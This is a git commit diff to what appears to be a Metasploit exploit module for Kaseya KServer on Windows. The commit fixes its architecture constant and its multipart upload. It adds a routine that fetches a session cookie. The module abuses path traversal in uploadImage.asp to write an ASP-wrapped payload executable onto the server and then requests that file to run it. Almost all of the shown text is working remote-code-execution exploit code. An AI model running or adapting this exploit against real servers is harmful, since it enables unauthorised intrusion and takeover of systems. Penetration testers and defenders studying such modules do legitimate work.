Fix the arch declaration in uploaded module.
parent
636fdfe2d2
commit
60a245b0c3
|
@ -24,7 +24,7 @@ Code executed in this manner runs under the IUSR account.
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Thomas Hibbert' # thomas.hibbert@security-assessment.com
|
||||
'Thomas Hibbert' # cartel
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -35,7 +35,7 @@ Code executed in this manner runs under the IUSR account.
|
|||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_x86,
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Kaseya KServer / Windows', {} ],
|
||||
|
@ -62,6 +62,21 @@ Code executed in this manner runs under the IUSR account.
|
|||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
def get_cookie
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
|
||||
})
|
||||
|
||||
if res and res.headers['Set-Cookie']
|
||||
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
|
||||
end
|
||||
|
||||
cookie
|
||||
end
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
@ -69,25 +84,30 @@ Code executed in this manner runs under the IUSR account.
|
|||
exe = generate_payload_exe
|
||||
asp = Msf::Util::EXE.to_exe_asp(exe)
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"")
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")
|
||||
|
||||
|
||||
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
|
||||
|
||||
cookie = get_cookie
|
||||
res = send_request_raw({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'),
|
||||
'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name),
|
||||
'data' => data,
|
||||
'headers' => {
|
||||
'ctype' => 'multipart/form-data; boundary=#{data.bound}'
|
||||
}
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
if not res or res.code != 200
|
||||
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Executing payload #{@payload_name}")
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(@payload_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue